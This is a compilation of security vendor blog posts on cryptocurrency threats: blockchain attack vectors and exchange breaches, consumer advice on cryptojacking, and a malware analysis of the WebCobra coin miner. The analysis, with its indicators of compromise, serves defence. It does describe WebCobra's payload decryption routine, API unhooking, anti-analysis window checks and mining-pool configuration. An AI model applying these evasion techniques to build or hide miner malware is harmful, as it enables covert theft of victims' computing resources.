However, hardware wallets are susceptible to exploitation as well, such as man-in-the-middle (MitM) supply chain attacks, wherein a compromised device is purchased. Such an event obstenibly occurred in early 2018, when an individual purchased a compromised Nano Ledger off of eBay, and consequently lost $34,000 USD worth of cryptocurrency stored on the device as the attacker created their own recovery seed to later retrieve the funds stored on the device. In order to trick the victim, the attacker included a fake recovery seed form inside the compromised device packaging (as seen in Figure 2).


Figure 2: Fraudulent recovery seed document for Ledger Nano (image source: Reddit)

To help mitigate the risk of such an attack, FireEye recommends only purchasing a hardware wallet from the manufacturer directly or through authorized resellers.

In addition to supply-chain attacks, security researchers with Wallet.fail have recently disclosed two vulnerabilities in the Ledger Nano S device. One of these vulnerabilities allows an attacker to execute arbitrary code from the boot menu, and the other allows physical manipulation without the user knowing due to a lack of tamper evidence. In both cases, physical access to the device is required, and thus deemed less likely to occur if proper physical security of the device is maintained and unauthorized third-party purchasing is avoided.

Paper Wallets

Typically, wallet software solutions hide the process of generating, using, and storing private keys from the user. However, a paper wallet involves using an open-source wallet generator like BitAddress[.]org and WalletGenerator[.]net to generate the user’s public and private keys. Those keys are then printed to a piece of paper. While many view this form of key management as more secure because the keys do not reside on a digital device, there are still risks.

Because the private key is printed on paper, theft, loss, and physical damage present the highest risk to the user. Paper wallets are one of the only forms of key management that outwardly display the private key in such a way and should be used with extreme caution. It is also known that many printers keep a cache of printed content, so the possibility of extracting printed keys from exploited printers should also be considered.

Exchanges & Key Custodians

According to recent Cambridge University research, in 2013 there were approximately 300,000 to 1.3 million users of cryptocurrency. By 2017 there were between 2.9 million and 5.8 million users. To facilitate this expedited user growth, a multitude of companies have materialized that offer services enabling user interaction with the various cryptocurrency networks. A majority of these businesses function as an exchange and/or key custodians. Consequently, this can make the organization an ideal candidate for intrusion activity, whether it be spear phishing, distributed denial of service (DDoS) attacks, ransomware, or extortion threats (from both internal and external sources).

Many cryptocurrency exchanges and services around the world have reportedly suffered breaches and thefts in recent years that resulted in substantial financial losses and, in many cases, closures (Figure 3). One 2013 study found that out of 40 bitcoin exchanges analyzed, over 22 percent had experienced security breaches, forcing 56 percent of affected exchanges to go out of business.


Figure 3: Timeline of publicly reported cryptocurrency service compromises

Some of the more notable cryptocurrency exchange attacks that have been observed are as follows:

Time Frame

Entity

Description

July 2018

Bancor

Bancor admitted that unidentified actors compromised a wallet that was used to upgrade smart contracts. The actors purportedly withdrew 24,984 ETH tokens ($12.5 million USD) and 229,356,645 NPXS (Pundi X) tokens (approximately $1 million USD). The hackers also stole 3,200,000 of Bancor's own BNT tokens (approximately $10 million USD). Bancor did not comment on the details of the compromise or security measures it planned to introduce.

June 2018

Bithumb

Attackers stole cryptocurrencies worth $30 million USD from South Korea's largest cryptocurrency exchange, Bithumb. According to Cointelegraph Japan, the attackers hijacked Bithumb's hot (online) wallet.

June 2018

Coinrail

Coinrail admitted there was a "cyber intrusion" in its system and an estimated 40 billion won ($37.2 million USD) worth of coins were stolen. Police are investigating the breach, but no further details were released.

February 2018

BitGrail

BitGrail claimed $195 million USD worth of customers' cryptocurrency in Nano (XRB) was stolen.

January 2018

Coincheck

Unidentified attackers stole 523 million NEM coins (approximately $534 million USD) from the exchange's hot wallet. Coincheck stated that NEM coins were kept on a single-signature hot wallet rather than a more secure multi-signature wallet and confirmed that stolen coins belonged to Coincheck customers.

July 2017

Coindash

Unidentified actors reportedly stole $7.4 million USD from users attempting to invest during a Coindash (app platform) ICO. Coindash, which offers a trading platform for ether, launched its ICO by posting an Ethereum address to which potential investors could send funds. However, malicious actors compromised the website and replaced the legitimate address with their own ether wallet address. Coindash realized the manipulation and warned users only three minutes after the ICO began, but multiple individuals had already sent funds to the wrong wallet. This incident was the first known compromise of an ICO, which indicates the persistent creativity of malicious actors in targeting cryptocurrencies.

June 2017

Bithumb

Bithumb, a large exchange for ether and bitcoin, admitted that malicious actors stole a user database from a computer of an employee that allegedly includes the names, email addresses, and phone numbers of more than 31,800 customers. Bithumb stated that its internal network was not compromised. Bithumb suggested that actors behind this compromise used the stolen data to conduct phishing operations against the exchange's users in an attempt to steal currency from its wallets, allegedly stealing cryptocurrency worth more than $1 million USD.

April 2017

Yapizon

Unidentified actor(s) reportedly compromised four hot wallets belonging to a South Korean Bitcoin exchange, Yapizon, and stole more than 3,816 bitcoins (approximately $5 million USD). The identity of the responsible actor(s) and the method used to access the wallets remain unknown. However, Yapizon stated that there was no insider involvement in this incident.

August 2016

Bitfinex

Malicious actor(s) stole almost 120,000 bitcoins ($72 million USD at the time), from clients' accounts at Bitfinex, an exchange platform in Hong Kong. How the breach occurred remains unknown, but the exchange made some changes to its systems after regulatory scrutiny. However, some speculate that complying with the regulators' recommendations made Bitfinex vulnerable to theft.

May 2016

Gatecoin

The Hong Kong-based Gatecoin announced that as much as $2 million USD in ether and bitcoin were lost following an attack that occurred over multiple days. The company claimed that a malicious actor altered its system so ether deposit transfers went directly to the attacker's wallet during the breach.

February 2015

KipCoin

The Chinese exchange KipCoin announced that an attacker gained access to its server in 2014 and downloaded the wallet.dat file. The malicious actor stole more than 3,000 bitcoins months later.

February 2015

BTER

BTER announced via its website that it lost 7,170 bitcoins, ($1.75 million USD at the time). The company claimed that the bitcoins were stolen from its cold wallet.

December 2015

Bitstamp

Bitstamp reported that multiple operational wallets were compromised, which resulted in the loss of 19,000 bitcoins. The company received multiple phishing attempts in the months prior to the theft. One employee allegedly downloaded a malicious file that gave the attacker access to servers that contained the wallet.dat file and passphrase for the company's hot wallet.

August 2014

BTER

The China-based exchange BTER claimed that an attacker stole 50 million NXT, ($1.65 million USD at the time). The company claims the theft was possible following an attack on one of its hosting servers. The company reportedly negotiated the return of 85 percent of the stolen funds from the attacker.

July 2014

MintPal

MintPal admitted that an attacker accessed 8 million VeriCoins ($1.8 million USD) in the company's hot wallet. The attackers exploited a vulnerability in its withdrawal system that allowed them to bypass security controls to withdraw the funds.

Early 2014

Mt. Gox

Mt. Gox, one of the largest cryptocurrency exchanges, filed for bankruptcy following a theft of 850,000 bitcoins (approximately $450 million USD at the time) and more than $24 million USD from its bank accounts. A bug in the exchange's system that went unidentified for years allegedly enabled this compromise. Additionally, some speculated that an insider could have conducted the theft. Notably, recent reports revolving around the arrest of the founder of BTC-e (Alexander Vinnik) suggest he was responsible for the attack on Mt. Gox.

Table 2: Sample of observed exchange breaches

As little oversight is established for cryptocurrency exchanges and no widely accepted security standards exist for them, such incidents will likely persist. Notably, while these incidents may involve outsiders compromising exchanges' and services' systems, many of the high-profile compromises have also sparked speculations that insiders have been involved.

Software Bugs

While there has yet to be an in-the-wild attack that has caused significant harm to the Bitcoin network itself, remember the Bitcoin software is just that: software. Developers have identified 30 common vulnerabilities and exposures (CVEs) since at least 2010, many of which could have caused denial of service attacks on the network, exposure of user information, degradation of transaction integrity, or theft of funds.

The most recent software bug was a transaction validation bug that affected the consensus rules; essentially allowing miners to create transactions that weren’t properly validated and contained an extra input – which could have ultimately been exploited to create an amount of bitcoin from nothing. This vulnerability went unnoticed for two years, and fortunately was responsibly disclosed.

Running any peer-to-peer (P2P) or decentralized and distributed software is risky because each individual user has the responsibility to upgrade software when bugs are found. The more people who fail to update their software in a timely manner, the greater the chance of those nodes being exploited or used to attack the network.

Scaling & Attack Surface

At the time of this post, scaling blockchain networks to the size required to support a truly global payment system still presents a problem for the new technology and is an area of contention among developers and industry players. To address this, many developers are working on various scaling solutions. The following are some of the proposed solutions and the risks associated with each:

On-chain Scaling

One proposed suggestion is to increase the block size, which consequently shifts the cost of scaling to miners and those who operate nodes. Some argue that this could introduce the risk of centralization, because the only larger organizations that can meet the bandwidth and storage demands of ever-increasing block sizes can support this type of solution.

Off-chain Scaling

Some of the more popular blockchain scaling solutions for crypto-assets often depend on layering networks and system architectures on top of the base protocol – also referred to as “layer two” (L2) scaling. This allows users to conduct transactions “off-chain” and only occasionally synchronize them with the Bitcoin blockchain. Many argue that this is similar to how legal contracts are enforced; you don’t need to go to court each time a legal contract is written, agreed upon, and executed. And this is something that already occurs frequently in Bitcoin, as the vast majority of transactions happen offline and off-chain within large exchanges’ and merchant providers’ cold storage solutions.

However, two choices for off-chain scaling exist:

Off-chain Private Databases

This solution involves pushing transactions off-chain to a privately managed database where transaction can be settled and then occasionally synced with the Bitcoin blockchain. However, in creating this second layer of private “off-chain” transaction processing, an element of trust is introduced to the system, which unfortunately introduces risk. When transactions occur “off-chain” in a centralized private database, there is risk of improperly secured centralized ledgers that can be falsified or targeted for attack.

Off-chain Trustless Payment Channels

Another L2 solution would be to push transactions off-chain – not onto a private database, but to a trustless decentralized routing network. There are two primary L2 solutions being developed: The Liquid Network (for Bitcoin) and Raiden (for Ethereum).

However, a critique of this type of scaling solution is that the accounts used on this layer are considered hot wallets, which presents the largest attack surface. This makes it the riskiest way to store funds while also creating a valuable target for hackers. If an attacker is able to identify and access a user’s L2 node and associated wallet, they could transmit all funds out of the user’s wallet.

Lightning and Raiden as scaling solutions are still relatively new and experimental, so it’s unknown whether the they will be globally accepted as the preferred industry scaling solution. Additionally, because this layered development is still new and not widely implemented, at the time of this post there has not yet been an instance or proof of concept attack against L2 networks.

Network & Protocol Attacks

Actors may also attempt to directly exploit a cryptocurrency P2P network or cryptographic protocol to either steal cryptocurrency or disrupt a cryptocurrency network. Albeit rare, successful attacks of this nature have been observed. Examples of attack vectors that fall into this category include the following:

51% Attack

The 51% attack refers to the concept that if a single malicious actor or cohesive group of miners controlled more than 50 percent of the computing capability validating a cryptocurrency's transactions, they could reverse their own transactions or prevent transactions from being validated. While previously considered theoretical, 51% attacks have been recently observed:

  • In early April 2018, the cryptocurrency Verge reportedly suffered a 51% attack, which resulted in the attacker being able to mine 1,560 Verge coins (XVG) every second for a duration of three hours.
  • In May 2018, developers notified various cryptocurrency exchanges of a 51% attack on Bitcoin Gold. According to a report by Bitcoinist, the attack cost exchanges nearly $18 million.
  • Following the Bitcoin Gold attack, in June 2018, ZenCash became another target of the 51% attack, in which attackers siphoned $550,000 USD worth of currency from exchanges.

Companies such as NiceHash offer a marketplace for cryptocurrency cloud mining in which individuals can rent hashing power. Couple the information available from sites like Crypto51, which calculates the cost of performing 51% attacks, and it presents an attractive option for criminals seeking to disrupt cryptocurrency networks. While these types of attacks have been observed, and are no longer theoretical, they have historically posed the most risk to various alt-coins with lower network participation and hash rate. Larger, more robust, proof-of-work (PoW) networks are less likely to be affected, as the cost to perform the attack outweighs potential profit.

We anticipate that as long as the cost to perform the 51% attack and the likelihood of getting caught remains low, while the potential profit remains high, actors will continue showing interest in these types of attacks across less-robust cryptocurrency networks. 

Sybil Attack

A Sybil attack occurs when a single node claims to be multiple nodes on the P2P network, which many see as one of the greatest security risks among all large-scale, peer-to-peer networks. A notable Sybil attack (in conjunction with a traffic confirmation attack) against the Tor anonymity network occurred in 2014, spanned the course of five months, and was conducted by unknown actors.

As it pertains to cryptocurrency networks in particular, attackers performing this type of attack could perform the following:

  • Block honest users from the network by outnumber honest nodes on the network, and refusing to receive or transmit blocks.
  • Change the order of transactions, prevent them from being confirmed, or even reverse transactions that can lead to double spending by controlling a majority of the network computing power in large-scale attacks.

As described by Microsoft researcher John Douceur, many P2P networks rely on redundancy to help lower the dependence on potential hostile nodes and reduce the risk of such attacks. However, this method of mitigation falls short if an attacker impersonates a substantial fraction of the network nodes, rendering redundancy efforts moot. The suggested solution to avoiding Sybil attacks in P2P networks, as presented in the research, is to implement a logically centralized authority that can perform node identity/verification. According to the research, without implementing such a solution, Sybil attacks will always remain a threat “except under extreme and unrealistic assumptions of resource parity and coordination among entities.”

Eclipse Attack

An eclipse attack involves an attacker or group controlling a significant number of nodes and then using those nodes to monopolize inbound and outbound connections to other victim nodes, effectively obscuring the victim node’s view of the blockchain and isolating it from other legitimate peers on the network. According to security researchers, aside from disrupting the network and filtering the victim node’s view of the blockchain, eclipse attacks can be useful in launching additional attacks once successfully executed. Some of these attacks include:

  • Engineered Block Races: Block races occur in mining when two miners discover blocks at the same time. Generally, one block will be added to the chain, yielding mining rewards, while the other block is orphaned and ignored, yielding no mining reward. If an attacker can successfully eclipse attack miners, the attacker can engineer block races by hoarding blocks until a competing block has been found by non-eclipsed miners – effectively causing the eclipsed miners to waste efforts on orphaned blocks.
  • Splitting Mining Power: An attacker could use eclipse attacks to effectively cordon off fractions of miners on a network, thereby eliminating their hashing power from the network. Removing hashing power from a network allows for easier 51% attacks to occur given enough miners are effectively segmented from the network to make a 51% attack profitable.

On Jan. 5, 2019, the cryptocurrency company Coinbase detected a possible eclipse + 51% attack effecting the Ethereum Classic (ETC) blockchain. The attack involved malicious nodes surrounding Coinbase nodes, presenting them with several deep chain reorganizations and multiple double spends – totaling 219,500 ETC (worth at the time of this reporting roughly $1.1 million USD).

While eclipse attacks are difficult to mitigate across large-scale P2P networks, some fixes can make them more difficult to accomplish. FireEye recommends implementing the following, where applicable, to help reduce the risk of eclipse attacks:

  • Randomized node selection when establishing connections.
  • Retain information on other nodes previously deemed honest, and implement preferential connection to those nodes prior to randomized connections (this increases the likelihood of connecting to at least one honest node).

How the Public and Private Sector Can Help Mitigate Risk

Public Sector Priorities

As blockchain technology continues to develop, and issues like scaling, security, and identity management are addressed, it is safe to assume the ecosystem we have today will not look like the ecosystem of tomorrow. Due to this, the public sector has generally maintained a hands-off approach to allow the space to mature and innovate before implementing firm regulations. However, in the future, there are likely to be certain key areas of regulation the public sector could focus on:

  • Virtual Currencies (tax implications, asset classification)
  • Data encryption
  • Privacy
  • Identity Management (KYC and FCC)

Private Sector’s Role

Because of the public sector’s wait-and-see approach to regulation, it could be argued that the private sector should have a more active role in securing the technology as it continues to mature. Private sector leaders in software and network development, hardware manufacturing, and cyber security all have the ability to weigh in on blockchain development as it progresses to ensure user security and privacy are top priorities. Universities and independent research groups should continue to study this emerging technology as it develops.

While no widely promoted and formal security standards exist for cryptocurrency networks at the time of this post, The Cryptocurrency Certification Consortium (C4) is actively developing the Cryptocurrency Security Standard (CCSS), a set of requirements and framework to complement existing information security standards as it relates to cryptocurrencies, including exchanges, web applications, and cryptocurrency storage solutions.

Cyber Security Community

From a cyber security perspective, we should learn from the vulnerabilities of TCP/IP development in the early days of the internet, which focused more on usability and scale than security and privacy – and insist that if blockchain technology is to help revolutionize the way business and trade is conducted that those two areas of focus (security and privacy) are held at the forefront of blockchain innovation and adoption. This can be achieved through certain self-imposed (and universally agreed upon) industry standards, including:

  • Forced encryption of locally stored wallet files (instead of opt-in options).
  • Code or policy rule that requires new wallet and key generation when user performs password changes.
  • Continued development and security hardening of multi-sig wallet solutions.
  • Emphasis on and clear guidelines for responsible bug disclosure.
  • Continued security research and public reporting on security implications of both known and hypothetical vulnerabilities regarding blockchain development.
    • Analyzing protocols and implementations to determine what threats they face, and providing guidance on best practices.

Outlook

While blockchain technology offers the promise of enhanced security, it also presents its own challenges. Greater responsibility for security is often put into the hands of the individual user, and while some of the security challenges facing exchanges and online wallet providers can be addressed through existing best practices in cyber security, linking multiple users, software solutions, and integration into complex legacy financial systems creates several new cyber security paradigms.

To maintain strong network security, the roles and responsibilities of each type of participant in a blockchain network must be clearly defined and enforced, and the cyber security risks posed by each type of participant must be identified and managed. It is also critical that blockchain development teams understand the full range of potential threats that arise from interoperating with third parties and layering protocols and applications atop the base protocols.

The value and popularity of cryptocurrencies has grown significantly in the recent years, making these types of currencies a very attractive target for financially motivated actors. Many of the aforementioned examples of the various attack vectors can be of high utility in financially motivated operations. We expect cyber crime actors will continue to demonstrate high interest in targeting cryptocurrencies and their underlying network protocols for the foreseeable future.

Cryptojacking Up 4,000% How You Can Block the Bad Guys

Cryptojacking RisingThink about it: In the course of your everyday activities — like grocery shopping or riding public transportation — the human body comes in contact with an infinite number of germs. In much the same way, as we go about our digital routines — like shopping, browsing, or watching videos — our devices can also pick up countless, undetectable malware or javascript that can infect our devices.

Which is why it’s possible that hackers may be using malware or script to siphon power from your computer — power they desperately need to fuel their cryptocurrency mining business.

What’s Cryptocurrency?

Whoa, let’s back up. What’s cryptocurrency and why would people rip off other people’s computer power to get it? Cryptocurrencies are virtual coins that have a real monetary value attached to them. Each crypto transaction is verified and added to the public ledger (also called a blockchain). The single public ledger can’t be changed without fulfilling certain conditions. These transactions are compiled by cryptocurrency miners who compete with one another by solving the complex mathematical equations attached to the exchange. Their reward for solving the equation is bitcoin, which in the crypto world can equal thousands of dollars.

Power Surge

Cryptojacking RisingHere’s the catch: To solve these complex equations and get to crypto gold, crypto miners need a lot more hardware power than the average user possesses. So, inserting malicious code into websites, apps, and ads — and hoping you click — allows malicious crypto miners to siphon power from other people’s computers without their consent.

While mining cryptocurrency can often be a harmless hobby when malware or site code is attached to drain unsuspecting users CPU power, it’s considered cryptojacking, and it’s becoming more common.

Are you feeling a bit vulnerable? You aren’t alone. According to the most recent McAfee Labs Threats Report, cryptojacking has grown more than 4,000% in the past year.

Have you been hit?

One sign that you’ve been affected is that your computer or smartphone may slow down or have more glitches than normal. Crypto mining code runs quietly in the background while you go about your everyday work or browsing and it can go undetected for a long time.

How to prevent cryptojacking

Be proactive. Your first line of defense against a malware attack is to use a comprehensive security solution on your family computers and to keep that software updated.

Cryptojacking Blocker. This new McAfee product zeroes in on the cryptojacking threat and helps prevent websites from mining for cryptocurrency (see graphic below). Cryptojacking Blocker is included in all McAfee suites that include McAfee WebAdvisor. Users can update their existing WebAdvisor software to get Cryptojacking Blocker or download WebAdvisor for free.

Cryptojacking Rising

Discuss it with your family. Cryptojacking is a wild concept to explain or discuss at the dinner table, but kids need to fully understand the digital landscape and their responsibility in it. Discuss their role in helping to keep the family safe online and the motives of the bad guys who are always lurking in the background.

Smart clicks. One way illicit crypto miners get to your PC is through malicious links sent in legitimate-looking emails. Be aware of this scam (and many others) and think before you click on any links sent via email.

Stick with the legit. If a website, an app, or pop-up looks suspicious, it could contain malware or javascript that instantly starts working (mining power) when you load a compromised web page. Stick with reputable sites and apps and be extra cautious with how you interact with pop-ups.

Install updates immediately. Be sure to keep all your system software up-to-date when alerted to do so. This will help close any security gaps that hackers can exploit.

Strong passwords. These little combinations are critical to your family’s digital safety and can’t be ignored. Create unique passwords for different accounts and be sure to change out those passwords periodically.

To stay on top of the latest consumer and security threats that could impact your family, be sure to listen to our podcast Hackable? And, like us on Facebook.

The post Cryptojacking Up 4,000% How You Can Block the Bad Guys appeared first on McAfee Blogs.

WebCobra Malware Uses Victims’ Computers to Mine Cryptocurrency

The authors thank their colleagues Oliver Devane and Deepak Setty for their help with this analysis.

McAfee Labs researchers have discovered new Russian malware, dubbed WebCobra, which harnesses victims’ computing power to mine for cryptocurrencies.

Coin mining malware is difficult to detect. Once a machine is compromised, a malicious app runs silently in the background with just one sign: performance degradation. As the malware increases power consumption, the machine slows down, leaving the owner with a headache and an unwelcome bill, as the energy it takes to mine a single bitcoin can cost from $531 to $26,170, according to a recent report.

The increase in the value of cryptocurrencies has inspired cybercriminals to employ malware that steals machine resources to mine crypto coins without the victims’ consent.

The following chart shows how the prevalence of miner malware follows changes in the price of Monero cryptocurrency.

Figure 1: The price of cryptocurrency Monero peaked at the beginning of 2018. The total samples of coin miner malware continue to grow. Source: https://coinmarketcap.com/currencies/monero/.

McAfee Labs has previously analyzed the cryptocurrency file infector CoinMiner; and the Cyber Threat Alliance, with major assistance from McAfee, has published a report, “The Illicit Cryptocurrency Mining Threat.” Recently we examined the Russian application WebCobra, which silently drops and installs the Cryptonight miner or Claymore’s Zcash miner, depending on the architecture WebCobra finds. McAfee products detect and protect against this threat.

We believe this threat arrives via rogue PUP installers. We have observed it across the globe, with the highest number of infections in Brazil, South Africa, and the United States.

Figure 2: McAfee Labs heat map of WebCobra infections from September 9–13.

This cryptocurrency mining malware is uncommon in that it drops a different miner depending on the configuration of the machine it infects. We will discuss that detail later in this post.

Behavior

The main dropper is a Microsoft installer that checks the running environment. On x86 systems, it injects Cryptonight miner code into a running process and launches a process monitor. On x64 systems, it checks the GPU configuration and downloads and executes Claymore’s Zcash miner from a remote server.

Figure 3: WebCobra’s installation window.

After launching, the malware drops and unzips a password-protected Cabinet archive file with this command:

Figure 4: The command to unzip the dropped file.

The CAB file contains two files:

  • LOC: A DLL file to decrypt data.bin
  • bin: Contains the encrypted malicious payload

The CAB file uses the following script to execute ERDNT.LOC:

Figure 5: The script to load the DLL file, ERDNT.LOC.

ERDNT.LOC decrypt data.bin and passes the execution flow to it with this routine:

  • [PlainText_Byte] = (([EncryptedData_Byte] + 0x2E) ^ 0x2E) + 0x2E

Figure 6: The decryption routine. 

The program checks the running environment to launch the proper miner, shown in the following diagram:

Figure 7: Launching the proper miner depending on a system’s configuration.

Once data.bin is decrypted and executed, it tries a few anti-debugging, anti-emulation, and anti-sandbox techniques as well as checks of other security products running on the system. These steps allow the malware to remain undetected for a long time.

Most security products hook some APIs to monitor the behavior of malware. To avoid being found by this technique, WebCobra loads ntdll.dll and user32.dll as data files in memory and overwrites the first 8 bytes of those functions, which unhooks the APIs.

List of unhooked ntdll.dll APIs

  • LdrLoadDll
  • ZwWriteVirtualMemory
  • ZwResumeThread
  • ZwQueryInformationProcess
  • ZwOpenSemaphore
  • ZwOpenMutant
  • ZwOpenEvent
  • ZwMapViewOfSection
  • ZwCreateUserProcess
  • ZwCreateSemaphore
  • ZwCreateMutant
  • ZwCreateEvent
  • RtlQueryEnvironmentVariable
  • RtlDecompressBuffer

List of unhooked user32.dll APIs

  • SetWindowsHookExW
  • SetWindowsHookExA

Infecting an x86 system

The malware injects malicious code to svchost.exe and uses an infinite loop to check all open windows and to compare each window’s title bar text with these strings. This is another check by WebCobra to determine if it is running in an isolated environment designed for malware analysis.

  • adw
  • emsi
  • avz
  • farbar
  • glax
  • delfix
  • rogue
  • exe
  • asw_av_popup_wndclass
  • snxhk_border_mywnd
  • AvastCefWindow
  • AlertWindow
  • UnHackMe
  • eset
  • hacker
  • AnVir
  • Rogue
  • uVS
  • malware

The open windows will be terminated if any of preceding strings shows in the windows title bar text.

Figure 8: Terminating a process if the windows title bar text contains specific strings.

Once the process monitor executes, it creates an instance of svchost.exe with the miner’s configuration file specified as an argument and injects the Cryptonight miner code.

Figure 9: Creating an instance of svchost.exe and executing the Cryptonight miner.

Finally, the malware resumes the process with the Cryptonight miner running silently and consuming almost all the CPU’s resources.

Figure 10: An x86 machine infected with the Cryptonight miner. 

Infecting an x64 system

The malware terminates the infection if it finds Wireshark running.

Figure 11: Checking for Wireshark.

The malware checks the GPU brand and mode. It runs only if one of the following GPUs is installed:

  • Radeon
  • Nvidia
  • Asus

Figure 12: Checking the GPU mode.

If these checks are successful, the malware creates the following folder with hidden attributes and downloads and executes Claymore’s Zcash miner from a remote server.

  • C:\Users\AppData\Local\WIX Toolset 11.2

Figure 13: Requesting the download of Claymore’s Zcash miner.

Figure 14: Claymore’s miner.

Figure 15: Executing the miner with its configuration file.

Finally, the malware drops a batch file at %temp%\–xxxxx.cMD to delete the main dropper from [WindowsFolder]\{DE03ECBA-2A77-438C-8243-0AF592BDBB20}\*.*.

Figure 16: A batch file deleting the dropper.

The configuration files of the miners follow.

Figure 17: Cryptonight’s configuration file.

This configuration file contains:

  • The mining pool: 5.149.254.170
  • Username: 49YfyE1xWHG1vywX2xTV8XZzbzB1E2QHEF9GtzPhSPRdK5TEkxXGRxVdAq8LwbA2Pz7jNQ9gYBxeFPHcqiiqaGJM2QyW64C
  • Password: soft-net

Figure 18: Claymore’s Zcash miner configuration file.

This configuration file contains:

  • The mining pool: eu.zec.slushpool.com
  • Username: pavelcom.nln
  • Password: zzz

Coin mining malware will continue to evolve as cybercriminals take advantage of this relatively easy path to stealing value. Mining coins on other people’s systems requires less investment and risk than ransomware, and does not depend on a percentage of victims agreeing to send money. Until users learn they are supporting criminal miners, the latter have much to gain.

 

MITRE ATT&CK techniques

  • Exfiltration over command and control channel
  • Command-line interface
  • Hooking
  • Data from local system
  • File and directory discovery
  • Query registry
  • System information discovery
  • Process discovery
  • System time discovery
  • Process injection
  • Data encrypted
  • Data obfuscation
  • Multilayer encryption
  • File deletion

Indicators of compromise

IP addresses
  • 5.149.249[.]13:2224
  • 5.149.254[.]170:2223
  • 104.31.92[.]212
Domains
  • emergency.fee.xmrig[.]com
  • miner.fee.xmrig[.]com
  •  saarnio[.]ru
  • eu.zec.slushpool[.]com

McAfee detections

  • CoinMiner Version 2 in DAT Version 8986; Version 3 in DAT Version 3437
  • l Version 2 in DAT Version 9001; Version 3 in DAT Version 3452
  • RDN/Generic PUP.x Version 2 in DAT Version 8996; Version 3 in DAT Version 3447
  • Trojan-FQBZ, Trojan-FQCB, Trojan-FQCR Versions 2 in DAT Version 9011; Versions 3 in DAT Version 3462

Hashes (SHA-256)

  • 5E14478931E31CF804E08A09E8DFFD091DB9ABD684926792DBEBEA9B827C9F37
  • 2ED8448A833D5BBE72E667A4CB311A88F94143AA77C55FBDBD36EE235E2D9423
  • F4ED5C03766905F8206AA3130C0CDEDEC24B36AF47C2CE212036D6F904569350
  • 1BDFF1F068EB619803ECD65C4ACB2C742718B0EE2F462DF795208EA913F3353B
  • D4003E6978BCFEF44FDA3CB13D618EC89BF93DEBB75C0440C3AC4C1ED2472742
  • 06AD9DDC92869E989C1DF8E991B1BD18FB47BCEB8ECC9806756493BA3A1A17D6
  • 615BFE5A8AE7E0862A03D183E661C40A1D3D447EDDABF164FC5E6D4D183796E0
  • F31285AE705FF60007BF48AEFBC7AC75A3EA507C2E76B01BA5F478076FA5D1B3
  • AA0DBF77D5AA985EEA52DDDA522544CA0169DCA4AB8FB5141ED2BDD2A5EC16CE

The post WebCobra Malware Uses Victims’ Computers to Mine Cryptocurrency appeared first on McAfee Blogs.

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners

Introduction

Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.

This blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.

What Is Mining?

As transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into "blocks" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the "chain" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called "pools" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.


Figure 1: The role of miners

Underground Interest

FireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.


Figure 2: Underground keyword mentions

Monero Is King

The majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called "ring signatures," which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are unfeasible to be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.

The Monero blockchain also uses what's called a "memory-hard" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.

Underground Advertisements for Miners

Because most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.

XMR Mining Utilities

XMR-STACK

MINERGATE

XMRMINER

CCMINER

XMRIG

CLAYMORE

SGMINER

CAST XMR

LUKMINER

CPUMINER-MULTI

Table 1: Commonly used Monero miner utilities

The following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.

Sample Advertisement #1 (Smart Miner + Builder)

In early April 2018, actor "Mon£y" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD – payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero – that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:

  • Unlimited builds
  • Builder GUI (Figure 4)
  • Written in AutoIT (no dependencies)
  • FUD
  • Safer error handling
  • Uses most recent XMRig code
  • Customizable pool/port
  • Packed with UPX
  • Works on all Windows OS (32- and 64-bit)
  • Madness Mode option


Figure 3: Monero Madness


Figure 4: Monero Madness builder

Sample Advertisement #2 (Miner + Telegram Bot Builder)

